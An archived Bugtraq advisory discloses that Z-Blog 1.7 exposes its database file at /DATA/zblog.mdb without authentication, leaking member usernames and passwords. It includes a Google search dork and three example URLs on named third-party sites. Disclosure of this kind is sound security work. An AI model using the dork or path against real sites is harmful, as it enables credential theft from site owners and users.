Z-Blog 1.7 Authentication Bypass Database Download Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Z-Blog 1.7 Authentication Bypass Database Download Vulnerability
From: Raed@xxxxxxxxxxx
Date: 1 Jun 2007 11:19:38 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

 * Author  : Hasadya Raed
 * Contact : RaeD@xxxxxxxxxxx ~>Israel Hacker
 * Greetz  : Fairoz :)
 * Advisory : Z-Blog 1.7 Authentication Bypass/Database Download Vulnerability 
 * Script   : Z-Blog 1.7            
 * Impact   : Remote 
 * Googledork : "Powered by Z-Blog 1.7" , "Powered By Z-Blog 1.7 Laputa Build 
70216"
 * Download   : http://bbs.rainbowsoft.org/attachment.php?aid=92


--/ REPRODUCE \--

# Attackers Can Authentication Bypass In This Product By Add The Following 
Files:
  ('/DATA/zblog.mdb') And Download The Database Which Contains Table Named 
[blog_Member]
  The Users Names And Passwords Inside

--/ Examples \--

http://www.uistudio.cn/blog/DATA/zblog.mdb
http://www.kenyja.com/blog/DATA/zblog.mdb
http://www.netpub.cn/nffish/DATA/zblog.mdb

Prev by Date: FLEA-2007-0023-1: firefox
Next by Date: phpreactor <===1.2.7 remote file include
Previous by thread: FLEA-2007-0023-1: firefox
Next by thread: phpreactor <===1.2.7 remote file include
Index(es):
- Date
- Thread